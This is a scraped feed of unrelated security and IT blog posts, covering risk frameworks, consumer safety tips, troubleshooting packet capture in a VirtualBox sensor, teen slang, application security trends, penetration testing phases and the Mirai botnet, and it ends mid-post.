Today I find myself in Louisville, KY performing a privacy assessment for a client. When visiting clients to perform an assessment, I meet with team members from all parts of the organization. Usually, I am accompanied by someone from the privacy office or legal team. Frequently, my escorts learn something new about the business and […]

The post What you don’t know may (pleasantly) surprise you appeared first on Privacy Ref Blog.

Cyber Security: Three Parts Art, One Part Science

As I reflect upon my almost 40 years as a cyber security professional, I think of the many instances where the basic tenets of cyber security—those we think have common understanding—require a lot of additional explanation. For example, what is a vulnerability assessment? If five cyber professionals are sitting around a table discussing this question, you will end up with seven or eight answers. One will say that a vulnerability assessment is vulnerability scanning only. Another will say an assessment is much bigger than scanning, and addresses ethical hacking and internal security testing. Another will say that it is a passive review of policies and controls. All are correct in some form, but the answer really depends on the requirements or criteria you are trying to achieve. And it also depends on the skills and experience of the risk owner, auditor, or assessor. Is your head spinning yet? I know mine is! Hence the “three parts art.”

There is quite a bit of subjectivity in the cyber security business. One auditor will look at evidence and agree you are in compliance; another will say you are not. If you are going to protect sensitive information, do you encrypt it, obfuscate it, or segment it off and place it behind very tight identification and access controls before allowing users to access the data? Yes. As we advise our client base, it is essential that we have all the context necessary to make good risk-based decisions and recommendations.

Let’s talk about Connection’s artistic methodology. We start with a canvas that has the core components of cyber security: protection, detection, and reaction. By addressing each of these three pillars in a comprehensive way, we ensure that the full conversation around how people, process, and technology all work together to provide a comprehensive risk strategy is achieved.

Protection:

People
Users understand threat and risk, and know what role they play in the protection strategy. For example, if you see something, say something. Don’t let someone surf in behind you through a badge check entry. And don’t think about trying to shut off your end-point anti-virus or firewall.

Process
Policy are established, documented, and socialized. For example, personal laptops should never be connected to the corporate network. Also, don’t send sensitive information to your personal email account so you can work from home.

Technology
Some examples of the barriers used to deter attackers and breaches are edge security with firewalls, intrusion detection and prevention, sandboxing, and advanced threat detection.

Detection:

The average mean time to identify an active incident in a network is 197 days. The mean time to contain an incident is 69 days.

People
Incident response teams need to be identified and trained, and all employees need to be trained on the concept of “if you see something, say something.” Detection is a proactive process.

Process
What happens when an alert occurs? Who sees it? What is the documented process for taking action?

Technology
What is in place to ensure you are detecting malicious activity? Is it configured to ignore noise and only alert you of a real event? Will it help you bring that 197-day mean time to detection way down?

Reaction:

People
What happens when an event occurs? Who responds? How do you recover? Does everyone understand their role? Do you War Game to ensure you are prepared WHEN an incident occurs?

Process
What is the documented process to reduce the Kill Chain—the mean time to detect and contain—from 69 days to 69 minutes? Do you have a Business Continuity and Disaster Recovery Plan to ensure the ability to react to a natural disaster, significant cyber breach such as ransomware, DDoS, or—dare I say it—a pandemic?

Technology
What cyber security consoles have been deployed that allow quick access to patch a system, change a firewall rule, switch ACL, or policy setting at an end point, or track a security incident through the triage process?

All of these things are important to create a comprehensive InfoSec Program. The science is the technology that will help you build a layered, in-depth defense approach. The art is how to assess the threat, define and document the risk, and create a strategy that allows you to manage your cyber risk as it applies to your environment, users, systems, applications, data, customers, supply chain, third party support partners, and business process.

More Art: Are You a Risk Avoider or Risk Transference Expert?

A better way to state that is, “Do you avoid all risk responsibility or do you give your risk responsibility to someone else?” Hint: I don’t believe in risk avoidance or risk transference.

Yes, there is an art to risk management. There is also science if you use, for example, The Carnegie Mellon risk tools. But a good risk owner and manager documents risk, prioritizes it by risk criticality, turns it into a risk register or roadmap plan, remediates what is necessary, and accepts what is reasonable from a business and cyber security perspective. Oh, by the way, those same five cyber security professional we talked about earlier? They have 17 definitions of risk.

As we wrap up this conversation, let’s talk about the importance of selecting a risk framework. It’s kind of like going to a baseball game and recognizing the program helps you know the players and the stats. What framework will you pick? Do you paint in watercolors or oils? Are you a National Institute of Standards (NIST) artist, an Internal Standards Organization artist, or have you developed your own framework like the Nardone puzzle chart? I developed this several years ago when I was the CTO/CSO of the Commonwealth of Massachusetts. It has been artistically enhanced over the years to incorporate more security components, but it is loosely coupled on the NIST 800-53 and ISO 27001 standards.

When it comes to selecting a security framework as a CISO, I lean towards the NIST Cyber Security Framework (CSF) pictured below. This framework is comprehensive, and provides a scoring model that allows risk owners to measure and target what risk level they believe they need to achieve based on their business model, threat profile, and risk tolerance. It has five functional focus areas. The ISO 27001 framework is also a very solid and frequently used model. Both of these frameworks can result in a Certificate of Attestation demonstrating adherence to the standard. Many commercial corporations do an annual ISO 27001 assessment for that very reason. More and more are leaning towards the NIST CSF, especially commercial corporations doing work with the government.

The art in cyber security is in the interpretation of the rules, standards, and requirements that are primarily based on a foundation in science in some form. The more experience one has in the cyber security industry, the more effective the art becomes. As a last thought, keep in mind that Connection’s Technology Solutions Group Security Practice has over 150 years of cyber security expertise on tap to apply to that art.

The post Cyber Security: Three Parts Art, One Part Science appeared first on Connected.

What’s in Your IoT Cybersecurity Kit?

Did you know the average internet-enabled household contains more than ten connected devices? With IoT devices proliferating almost every aspect of our everyday lives, it’s no wonder IoT-based attacks are becoming smarter and more widespread than ever before. From DDoS to home network exposures, it appears cybercriminals have set their sights on the digital dependence inside the smart home — and users must be prepared.

A smart home in today’s world is no longer a wave of the future, but rather just a sign of the times we live in. You would be hard pressed to find a home that didn’t contain some form of smart device. From digital assistants to smart plugs, with more endpoints comes more avenues bad actors can use to access home networks. As recently as 2018, users saw virtual assistants, smart TVs, and even smart plugs appear secure, but under the surface have security flaws that could facilitate home network exposures by bad actors in the future. Whereas some IoT devices were actually used to conduct botnet attacks, like an IoT thermometer and home Wi-Fi routers.

While federal agencies, like the FBI, and IoT device manufacturers are stepping up to do their part to combat IoT-based cyberattacks, there are still precautions users should take to ensure their smart home and family remain secure. Consider this your IoT cybersecurity kit to keep unwelcome visitors out of your home network.

  • When purchasing an IoT device, make security priority #1. Before your next purchase, conduct due diligence. Prioritize devices that have been on the market for an extended period of time, have a trusted name brand, and/or have a lot of online reviews. By following this vetting protocol, the chances are that the device’s security standards will be higher.
  • Keep your software up-to-date on all devices. To protect against potential vulnerabilities, manufacturers release software updates often. Set your device to auto-update, if possible, so you always have the latest software. This includes the apps you use to control the device.
  • Change factory settings immediately. Once you bring a new device into your home, change the default password to something difficult to guess. Cybercriminals often can find the default settings online and can use them to access your devices. If the device has advanced capabilities, use them.
  • Secure your home network. It’s important to think about security as integrated, not disconnected. Not all IoT devices stay in the home. Many are mobile but reconnect to home networks once they are back in the vicinity of the router. Protect your network of connected devices no matter where they go. Consider investing in advanced internet router that has built-in protection that can secure and monitor any device that connects to your home network.
  • Use comprehensive security software. Vulnerabilities and threats emerge and evolve every day. Protect your network of connected devices no matter where you are with a tool like McAfee Total Protection.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post What’s in Your IoT Cybersecurity Kit? appeared first on McAfee Blogs.

Troubleshooting NSM Virtualization Problems with Linux and VirtualBox

I spent a chunk of the day troubleshooting a network security monitoring (NSM) problem. I thought I would share the problem and my investigation in the hopes that it might help others. The specifics are probably less important than the general approach.

It began with ja3. You may know ja3 as a set of Zeek scripts developed by the Salesforce engineering team to profile client and server TLS parameters.

I was reviewing Zeek logs captured by my Corelight appliance and by one of my lab sensors running Security Onion. I had coverage of the same endpoint in both sensors.

I noticed that the SO Zeek logs did not have ja3 hashes in the ssl.log entries. Both sensors did have ja3s hashes. My first thought was that SO was misconfigured somehow to not record ja3 hashes. I quickly dismissed that, because it made no sense. Besides, verifying that intution required me to start troubleshooting near the top of the software stack.

I decided to start at the bottom, or close to the bottom. I had a sinking suspicion that, for some reason, Zeek was only seeing traffic sent from remote systems, and not traffic originating from my network. That would account for the creation of ja3s hashes, for traffic sent by remote systems, but not ja3 hashes, as Zeek was not seeing traffic sent by local clients.

I was running SO in VirtualBox 6.0.4 on Ubuntu 18.04. I started sniffing TCP network traffic on the SO monitoring interface using Tcpdump. As I feared, it didn't look right. I ran a new capture with filters for ICMP and a remote IP address. On another system I tried pinging the remote IP address. Sure enough, I only saw ICMP echo replies, and no ICMP echoes. Oddly, I also saw doubles and triples of some of the ICMP echo replies. That worried me, because unpredictable behavior like that could indicate some sort of software problem.

My next step was to "get under" the VM guest and determine if the VM host could see traffic properly. I ran Tcpdump on the Ubuntu 18.04 host on the monitoring interface and repeated my ICMP tests. It saw everything properly. That meant I did not need to bother checking the switch span port that was feeding traffic to the VirtualBox system.

It seemed I had a problem somewhere between the VM host and guest. On the same VM host I was also running an instance of RockNSM. I ran my ICMP tests on the RockNSM VM and, sadly, I got the same one-sided traffic as seen on SO.

Now I was worried. If the problem had only been present in SO, then I could fix SO. If the problem is present in both SO and RockNSM, then the problem had to be with VirtualBox -- and I might not be able to fix it.

I reviewed my configurations in VirtualBox, ensuring that the "Promiscuous Mode" under the Advanced options was set to "Allow All". At this point I worried that there was a bug in VirtualBox. I did some Google searches and reviewed some forum posts, but I did not see anyone reporting issues with sniffing traffic inside VMs. Still, my use case might have been weird enough to not have been reported.

I decided to try a different approach. I wondered if running VirtualBox with elevated privileges might make a difference. I did not want to take ownership of my user VMs, so I decided to install a new VM and run it with elevated privileges.

Let me stop here to note that I am breaking one of the rules of troubleshooting. I'm introducing two new variables, when I should have introduced only one. I should have built a new VM but run it with the same user privileges with which I was running the existing VMs.

I decided to install a minimal edition of Ubuntu 9, with VirtualBox running via sudo. When I started the VM and sniffed traffic on the monitoring port, lo and behold, my ICMP tests revealed both sides of the traffic as I had hoped. Unfortunately, from this I erroneously concluded that running VirtualBox with elevated privileges was the answer to my problems.

I took ownership of the SO VM in my elevated VirtualBox session, started it, and performed my ICMP tests. Womp womp. Still broken.

I realized I needed to separate the two variables that I had entangled, so I stopped VirtualBox, and changed ownership of the Debian 9 VM to my user account. I then ran VirtualBox with user privileges, started the Debian 9 VM, and ran my ICMP tests. Success again! Apparently elevated privileges had nothing to do with my problem.

By now I was glad I had not posted anything to any user forums describing my problem and asking for help. There was something about the monitoring interface configurations in both SO and RockNSM that resulted in the inability to see both sides of traffic (and avoid weird doubles and triples).

I started my SO VM again and looked at the script that configured the interfaces. I commented out all the entries below the management interface as shown below.

$ cat /etc/network/interfaces

# This configuration was created by the Security Onion setup script.
#
# The original network interface configuration file was backed up to:
# /etc/network/interfaces.bak.
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# loopback network interface
auto lo
iface lo inet loopback

# Management network interface
auto enp0s3
iface enp0s3 inet static
  address 192.168.40.76
  gateway 192.168.40.1
  netmask 255.255.255.0
  dns-nameservers 192.168.40.1
  dns-domain localdomain

#auto enp0s8
#iface enp0s8 inet manual
#  up ip link set $IFACE promisc on arp off up
#  down ip link set $IFACE promisc off down
#  post-up ethtool -G $IFACE rx 4096; for i in rx tx sg tso ufo gso gro lro; do ethtool -K $IFACE $i off; done
#  post-up echo 1 > /proc/sys/net/ipv6/conf/$IFACE/disable_ipv6

#auto enp0s9
#iface enp0s9 inet manual
#  up ip link set $IFACE promisc on arp off up
#  down ip link set $IFACE promisc off down
#  post-up ethtool -G $IFACE rx 4096; for i in rx tx sg tso ufo gso gro lro; do ethtool -K $IFACE $i off; done
#  post-up echo 1 > /proc/sys/net/ipv6/conf/$IFACE/disable_ipv6

I rebooted the system and brought the enp0s8 interface up manually using this command:

$ sudo ip link set enp0s8 promisc on arp off up

Fingers crossed, I ran my ICMP sniffing tests, and voila, I saw what I needed -- traffic in both directions, without doubles or triples no less.

So, there appears to be some sort of problem with the way SO and RockNSM set parameters for their monitoring interfaces, at least as far as they interact with VirtualBox 6.0.4 on Ubuntu 18.04. You can see in the network script that SO disables a bunch of NIC options. I imagine one or more of them is the culprit, but I didn't have time to work through them individually.

I tried taking a look at the network script in RockNSM, but it runs CentOS, and I'll be darned if I can't figure out where to look. I'm sure it's there somewhere, but I didn't have the time to figure out where.

The moral of the story is that I should have immediately checked after installation that both SO and RockNSM were seeing both sides of the traffic I expected them to see. I had taken that for granted for many previous deployments, but something broke recently and I don't know exactly what. My workaround will hopefully hold for now, but I need to take a closer look at the NIC options because I may have introduced another fault.

A second moral is to be careful of changing two or more variables when troubleshooting. When you do that you might fix a problem, but not know what change fixed the issue.

Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity

The net is dark and full of terrors, especially for fans of HBO’s popular show Game of Thrones®. As followers of the series gear up for the premiere of the eighth and final season on April 14th, fans may have more than just White Walkers to worry about. According to McAfee’s study on the Most Dangerous Celebrities, it turns out that search results for Emilia Clarke are among those most likely to be infected with malware.

In fact, the actress who portrays Daenerys Targaryen in the TV drama came in at #17 of our 2018 Most Dangerous Celebrities study. Cybercriminals use the allure of celebrities – such as Clarke – to trick unsuspecting users into visiting malicious websites. These sites can be used to install malware on a victim’s device or steal their personal information or passwords. With the premiere of the new season right around the corner, it’s likely that cybercrooks will take advantage of the hype around the show to lure supporters into their trap.

Thankfully, there are plenty of ways fans can keep up with the show and characters without putting their online safety at risk. Follow these tips to pledge your allegiance to your cybersafety:

  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites is the equivalent of spreading the Mad King’s wildfire to your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.
  • Be careful what you click. Don’t bend the knee to hackers who tempt users to click on their malicious sites. Users looking for information on the new season should be careful and trust only reliable sources. The safest option is to wait for the official release instead of visiting a potentially malware-ridden third-party website.
  • Keep your device software updated. Install new system and application updates on your devices as soon as they’re available. These updates often include security fixes that can help protect your laptop or computer from an army of undead software bugs.
  • Protect your online realm with a cybersecurity solution. Send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

We wish you good fortune in the browsing to come. To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Copyright ©2019 McAfee, LLC

The post Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity appeared first on McAfee Blogs.

12 ways IT can create business value in 2019

With technology today’s fuel for business transformation, IT leaders are increasingly seen as key players in companies’ quests to bolster their bottom lines. But with so many new technologies and management approaches emerging, where should IT leaders put their focus?

We asked a range of tech leads what they’re planning this year and how those initiatives can best be approached to add value to their organizations, based on business priorities. Some involve embracing emerging technologies for improved workflows and products; others involve new approaches to how work gets done.   

Here’s what tech leaders think should be top of mind for creating value in 2019.

To read this article in full, please click here

(Insider Story)

Teen Texting Slang (and Emojis) Parents Should Know

What adults call texting, kids call talking. They “talk” on their phones via chat, social comments, snaps, posts, tweets, and direct messages. And they are talking most of the time — tap, tap, tap — much like background music. In all this “talking” a language, or code, emerges just as it has for every generation only today that language is in acronyms, hashtags, and emojis. And while the slang is perfectly understood peer-to-peer, it has parents googling like crazy to decipher it.

And this language changes all the time. It expands, contracts and specific acronyms and symbols (emojis) can change in meaning entirely over time, which is why we update this list every periodically.

This time we’ve added emojis (scroll to bottom) since those powerful little graphic symbols have singlehandedly transformed human communication, as we know it.

Harmless Banter

We publish this list with an important reminder: Teen texting slang isn’t inherently bad or created with an intent to deceive or harm. Most of the terms and symbols have emerged as a kind of clever shorthand for fast moving fingers and have no dangerous or risky meaning attached. So, if you are monitoring your kids’ phones or come across references you don’t understand, assume the best in them (then, of course, do your homework).

For example, there are dozens of harmless words such as finna (fixing to do something), yeet (a way to express excitement), skeet (let’s go), Gucci (great, awesome, or overpriced), AMIRITE (am I right?) QQ4U (quick question for you), SMH (shaking my head), bread (money), IDRK (I don’t really know), OOTD (outfit of the day), LYAAF (love you as a friend), MCE (my crush everyday), HMU (hit me up, call me), W/E (whatever), AFK (away from keyboard), RTWT (read the whole thread), CWYL (chat with you later), Ship (relationship), CYT (see you tomorrow) or SO (significant other).

The Red Flags 

Here are some terms and emojis that may not be so innocent. Any of these terms can also appear as hashtags if you put a # symbol in front of them.

Potential bullying slang

Ghost = to ignore someone on purpose

Boujee = rich or acting rich

Sip tea = mind your own business

The tea is so hot = juicy gossip

AYFKM? = are you f***ing kidding me?

Thirsty = adjective describing a desperate-acting, needy person

Basic = annoying person, interested in shallow things

Extra = over the top, excessive, dramatic person

TBH = to be honest (sometimes followed by negative comments)

Zerg = to gang up on someone (a gaming term that has morphed into a bullying term)

KYS = kill yourself

SWYP = so what’s your problem?

182 = I hate you
Curve = to reject someone

Shade = throwing shade, to put someone down.

POS = piece of sh**

WTF = what the f***

Derp = stupid

Lsr = loser

Butters = ugly

Jelly = jealous

Subtweet = talking about someone but not using their @name

Bizzle = another word for b***h

THOT or thotties = a promiscuous girl/s

YAG = you are gay

Cyber pretty = saying someone only looks good online with filters

Beyouch = another word for b***h

RAB = rude a** b***h

IMHO = in my honest opinion

IMNSHO = in my not so honest opinion

NISM = need I say more?

Potential risky behavior slang  

Broken = hung over

Pasted = high or drunk

Belfie = self-portrait (selfie) featuring the buttocks

OC = open crib, party at my house

PIR = parents in the room

9, CD9, Code 9 = parents here

99 = parents gone

Smash = to have casual sex

Slide into my DM = connecting through a direct message on a social network with sexual intentions

A3: Anytime, anywhere, anyplace

WTTP = want to trade pictures?

S2R = send to receive (pictures)
sugarpic = Refers to a suggestive or erotic photograph

TDTM = talk dirty to me

KMS = kill myself

AITR = adults in the room

KPC = keeping parents clueless

1174 = invite to a wild party usually followed by an address

53X = sex

Chirped = got caught

Cu46 = See you for sexTDTM = talk dirty to meLMIRL = let’s meet in real life

GNRN = get naked right now

Pron = porn

Frape = Facebook rape; posting to someone else’s profile when they leave it logged in.

NSFW = not safe for work (post will include nudity, etc)

Livingdangerously = taking selfies while driving or some other unsafe behavior

Kik = let’s talk on kik instant message instead

Sue = suicide

Dep = depression

Svv = self- harming behavior

SN = send nudes

Nend sudes = another way to say SN/send nudes

PNP = party and play (drugs + sex)

 

Potential drug-related slang

420, bud, tree = marijuana

Blow, mayo, white lady, rock, snow, yay, yale, yeyo, yank, yahoo = Cocaine

Special K = ketamine, liquid tranquilizer

Pearls = a nicely rolled blunt

Dabbing = concentrated doses of marijuana (began as a dance craze)

DOC = drug of choice

Turnt up / turnt = high or drunk

Geeked up = being high

Bar = Xanax pill

Bar out = to take a Xanax pill

Baseball = crack cocaine

Skrill = Money

Bread = money

CID = acid

E, XTC  = ecstasy

Hazel = heroin

Blue Boogers = snorting Adderall or Ritalin

Pharming = getting into medicine cabinets to find drugs to get high

Oxy, perks, vikes = opioids

Robo-tripping = consuming cough syrup to get high

Tweaking = high on amphetamines

Wings = cocaine; heroin

Speed, crank, uppers, Crystal or Tina = meth

 

Red flag emojis

Frog = an ugly person

Frog + tea (coffee) cup = that’s the tea (gossip)

Any kind of green plant/leaves = marijuana

Maple leaf = marijuana

Broccoli = marijuana

Smoke puff or gasoline = get high

Snowflake = cocaine

Person skiing = cocaine

Pill = ecstasy or MDMA for sale

Face with steam from nose = MDMA drug

Rocket = high potency drug for sale

Syringe = heroin

Diamond = crystal meth, crack cocaine for sale

Skull = die

Knife + screaming face = calling someone a psycho

Bowling ball + person running = I’m gonna hit you, coming for you

Flowers = drugs

Dollar sign = it’s for sale

Syringe = heroine (also tattoo)

Cat with heart eyes = sex

Purple face with horns = sex

Gas pump = sex

Tongue, eggplant, water drops, banana, peach, taco, cherries, drooling face, rocket = sex

Rose, rosette, cherry, pink cherry blossom, growing heart, airplane, crown = emojis that refer to sex trafficking

When it comes to figuring out what your kids are up to online, using your own instincts and paying attention will be your best resources. If something doesn’t sound or look right on your child’s phone trust that feeling and look deeper. You don’t have to know every term or symbol — the more important thing is to stay aware and stay involved.

The post Teen Texting Slang (and Emojis) Parents Should Know appeared first on McAfee Blogs.

A Deeper Look at Gartner’s Hype Cycle for Application Security

The application security market is ever-changing, with new technologies emerging on a continuous basis. One helpful way to stay on top of the AppSec market is Gartner’s most recent Hype Cycle for Application Security, 2018.

When it comes to DevSecOps, Gartner notes that “adoption is slow, but interest is high,” and showcases development’s shift towards DevOps environments in the name of speed and agility. DevOps is great for an organization, but not if the security piece is siloed and acts in a way that disrupts the speed of development. This is why, Gartner points out, “Security must be a part of this shift, but in a way that respects the collaborative nature of DevOps.”

Veracode’s own Tim Jarrett, Director of Product Management, recently attended DevSecOps Days as part of this year’s RSA Conference, and took away some valuable points on trends in DevSecOps. The general overview was that the theory of DevOps is fantastic, but the practice itself isn’t as straightforward, which is why it makes sense that DevSecOps is catching on in theory, but remains aspirational in practice. This might seem like a bump in the road of progression, but DevSecOps can be successful if security teams are able to communicate the definitive business value.

Read more about Tim’s DevSecOps Days takeaways here.

Software composition analysis

According to Gartner, “Software Composition Analysis is expected to reach the ‘Plateau of Productivity’ in two to five years.” This is supported by the fact that SCA has become more of a mainstream technology that vendors offer as a part of their solution suites. The surge of SCA offerings from software security vendors essentially began when attention was called to the widespread impact of software vulnerabilities like Heartbleed and Apache Struts.

The need for a solution that could analyze open source components was only furthered by the widespread use of open source code and the rampant amount of vulnerabilities that came along with such components. Veracode’s own State of Software Security Report Vol. 9 reported that in last year alone, 87.5% of Java applications contained a component with at least one vulnerability.

In addition to recommending that organizations use SCA tools on a regular basis to ensure software security, Gartner also stated that “SCA tools fit well within DevSecOps-style workflows, where scanning can be automated as part of the rapid development processes.”

Get the State of Software Security Volume 9 Software Composition Analysis Infosheet here.

Application security testing suites

Application security testing suites are a consolidation of AST technologies, including – but not limited to – static analysis, dynamic analysis, software composition analysis, and secure code training to more effectively verify the security of a company’s codebase.

To cover all of your bases when it comes to application security, one option is to use multiple vendors so that you have access to the “best-of-breed” technologies in each category. However, Gartner points out the downside to this approach; “the requirement to deal with different systems, separate dashboards,” and a not-really-unified approach. “Rather than engaging multiple vendors, Gartner clients have increasingly been seeking ‘one-stop-shop’ vendors that offer multiple technologies in a single platform with flexible deployment options.”

Veracode is one of those “one-stop-shops,” and can provide visibility into application status across all testing types, including SAST, DAST, SCA, and manual penetration testing in one centralized view. To learn more about Veracode’s comprehensive AppSec platform, check out this Platform Overview eBook, or, schedule a demo to see how we can help your specific organization.

 

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Gartner, Hype Cycle for Application Security, 2018, 27 July 2018, Ayal Tirosh

Six Stages of Penetration Testing

Six Stages of Penetration Testing

Through penetration testing, you can proactively identify the most exploitable security weaknesses before someone else does. However, there’s a lot more to it than the actual act of infiltration. Pen testing is a thorough, well thought out project that consists of several phases. Read on to learn about what it takes to complete a successful pen test.

Planning and Preparation

Many old adages proclaim the import of preparation, and when it comes to penetration testing, planning is indeed the key to success. There are multiple ways to approach a pen test and figuring out your goals and scoping accordingly is key to ensuring that you’re going to get the most out of the process. Consider these questions to ensure your expectations are aligned with the testers and you get the information you’re looking for.

  • Do you want an external test, which simulates an attack from an outside individual or organization, or an internal test, which simulates an attack from an insider, or an attacker that has a foothold within the organization?
  • Would you prefer your security team to know a pen test is about to be performed, or would you rather it be performed covertly to identify their effectiveness in detecting the activity?
  • How much information do you want to share with the pen testers beforehand?
  • How aggressive are the pen testers allowed to be?

 

Discovery

Once the scope has been established, pen testing teams can get to work. In this discovery phase, teams perform different types of reconnaissance on their target. On the technical side, information like IP addresses can help determine information about firewalls and other connections. On the personal side, data as simple as names, job titles, and email addresses can hold great value. Attackers can use this data to send phishing emails or figure out who may have privileged credentials, with which they can get full access to the environment.
Additionally, before exploiting a system, pen testing teams must look for weaknesses within the environment. Often referred to as footprinting, this phase of discovery involves gathering as much information about the target systems, networks, and their owners as possible without attempting to penetrate them. An automated scan is one technique that can be used to search for vulnerabilities that can be used as a doorway.

Penetration Attempt and Exploitation

Now informed about their target, pen testers can begin using these newly discovered entry points, testing all of the weaknesses they discovered. They will attempt to enter the target through these identified entry points.
But pen testers will do far more than just attempt to gain access. Once inside a compromised system, they will try to elevate their access privileges within the environment, allowing them to take any number of additional actions. Gaining administrative privileges enables pen testers to identify security weaknesses in other areas and resources, like poor configuration, unguarded access to sensitive data, or ineffective management of accounts and passwords.   
Additionally, multiple types of assets can be tested. In addition to the on-premise network infrastructure and workstations you’d expect could be vulnerable to attack, mobile devices, web applications, and even IoT devices like security cameras, can also be put to the test.

Analysis and Reporting

Pen testers should carefully track everything they do during the discovery and exploitation process.  From there, they can create a report that includes all of these details, highlighting what was used to successfully penetrate the system, what security weaknesses were found, and any other pertinent information discovered.
These reports should also include analysis to help map out next steps once the test has concluded. Pen testing teams can help determine the highest priority items that an organization should take care of as soon as possible, as well as suggestions for remediation methods.

Clean Up and Remediation

Just as with a real attack, pen testers can leave “footprints.” It’s critical to go back through systems and remove any artifacts used during the test, since they could be leveraged in the future by someone with nefarious intentions. Once this is completed, an organization can go about the business of fixing the security weaknesses discovered and prioritized during the testing phase. This may include putting compensating controls in place to protect weaknesses that cannot be easily remediated, or even investing in new solutions that can streamline security and improve efficiency.

Retest

Penetration tests can and should be utilized frequently, especially when new applications or infrastructure are being deployed. Even if your organization believes they resolved every weakness listed in a previous report, the best way to ensure your remediations are effective is to test again. Additionally, IT environments, and the methods used to attack them, are constantly evolving, so it is to be expected that new weaknesses will emerge.

With so many breaches dominating the news, it’s more critical than ever to reduce the chance that an incident could put your organization’s reputation and trustworthiness at stake. Organizations should do everything they can to understand and avoid behaviors that put them at risk. Pen testing is an essential part of a risk assessment strategy and helps ensure that your organization is reducing the chance of a damaging breach occurring within your environment.

Read our guide to learn how you can get smarter about penetration testing.

English

5 Phases of Pen Testing resize.png

Penetration testing
Big text: 
Blog
Resource type: 
Blogs

Teaching Old Malware New Tricks: How the Latest Mirai Variant Targets New Devices

Though initially created to give players of the game Minecraft an advantage, the Mirai malware strain has since been responsible for a number of notable distributed denial of service (DDoS) attacks, including the one suffered by DNS provider Dyn, which resulted in outages for numerous Internet platforms. Before its creators were caught and prosecuted, they posted the source code online, allowing Mirai to take on a life of its own. Mirai has now reemerged, enhanced and ready to cause more damage. Read on to learn how Mirai works, what its newest features are, and how you can protect your organization from this destructive malware strain.


What is a Botnet?

Mirai operates by breaching Linux devices and creating botnets. This type of malware operates by having its original home device, known as a bot herder or bot master, infect and remotely controlling any kind of device – from a smart phone to a security camera. Using this command-and-control technique (C&C or C2), it can instruct the breached device to run a bot, which is a software application that runs automated scripts to perform tasks over the Internet. Once the bot herder has taken control of multiple devices, often numbering into the hundreds or thousands, it uses this cluster of bots, known as a botnet, to run more sophisticated, malicious tasks.

Most commonly, botnets are used in DDoS attacks, like the Dyn incident mentioned above. With so many bots under their control, an attacker can have all of them send requests to a targeted system, flooding it with traffic, blocking out any legitimate requests. Eventually, this influx of traffic will overwhelm a system, causing it to crash.

 
Brand New Enterprise Exploits

Mirai resurfaced a few times since its initial foray onto the scene. Since the code is now freely available, changes can be made at the whim of any malicious actor. For example, in early 2018, one successor used its botnet to steal cryptocurrency from computers dedicated to cryptocurrency mining.

Now Mirai has rematerialized once more, with this variant updated to target eleven additional devices. A few of these exploits, like the WePresent Wireless Presentations and LG Supersign TVs, are devices intended for use by enterprise organizations. This pivot into business class devices should put businesses on their guard, since it gives attackers a window into organizational networks for additional exploitation. Additionally, it shows a pivot towards loftier end goals, since devices connected to these enterprise networks give threat actors even more bandwidth to use in their botnet attacks.


Same Old Mirai Infrastructure

Mirai isn’t a particularly complex piece of malware – which is dangerous in its own right, as it gives far more people opportunities to use it. Ultimately, its success lies in its exploitation on the weak security that plagues most IoT devices.

Mirai’s bot master directs its controlled devices to continuously scan the Internet in search of IP addresses for IoT devices. From there, it uses a list of default usernames and passwords to attain administrative access of the device. Given Mirai’s numerous successful attacks, there are a worrisomely large number of devices that still have these credentials in place.

This strategy would be far less frequently successful on traditional workstations and servers within an organization. First, they are far more likely to have policies in place requiring frequent password changes, multi-factor authentication, or even identity and access management solutions to ensure that administrative access isn’t so easily acquired.

Moreover, most antivirus solutions for workstations or servers would be able to spot these simplistic breach attempts and stop them in their tracks. Unfortunately, nearly all IoT devices still lack antivirus solutions, making them a prime target for techniques that are no longer as common on workstations or network servers.

Finally, IoT devices are ideal because most of them are constantly connected to the internet and are owned or operated by users who are unaware of the security risks that these devices can pose.


Fighting Command and Control with Advanced Threat Detection

In addition to having ideal targets in IoT devices, botnets like Mirai are also particularly difficult to detect and remove because aside from causing a system to become sluggish at times, they don’t really do anything to make their presence known.

With this latest iteration of Mirai, along with a number of other botnets currently being deployed, threatening enterprise IoT devices, how can an organization be sure that their devices aren’t currently under the control of a bot master? Advanced threat detection solutions like Core Network Insight constantly monitor network traffic for threat behavior and activities, detecting anomalous behavior in real time and with certainty by providing definitive evidence of infections, regardless of device type. This allows security teams to take immediate action to clear bots from the system.

While this variant is new, Mirai’s structure of C&C communication techniques remain the same. Core Network Insight detects based on this type of communication, so no matter the variant, Network Insight will still be able to accurately uncover it. Network Insight is also agentless, as well as OS and platform agnostic, so no matter how many different device types are targeted, botnets like Mirai cannot evade detection.

To get more information on the only mature, purpose built active threat detection solution on the market, or  a personalized demonstration from one of our experts, contact us today.

English

Teaching Old Malware New Tricks 2.png

Network Insight
Big text: 
Blog
Resource type: 
Blogs

3 Factors to Consider When Securing Big Data

Big data is the new toy in town—a technological commodity that is driving development, but is also a major point of contention between companies, users, and governing entities. But despite the name big data, it is often in the possession of small businesses, who have not taken the appropriate measures to secure this data.  When such large amounts of information are on the line, a breach of this data can be extremely detrimental.

With continual scandals being aired concerning poor privacy protections, it is even more important for your data to be protected. Consider these three things when securing big data: your specific configurations, what access you give out, and how to monitor your data.

1.  Configurations 

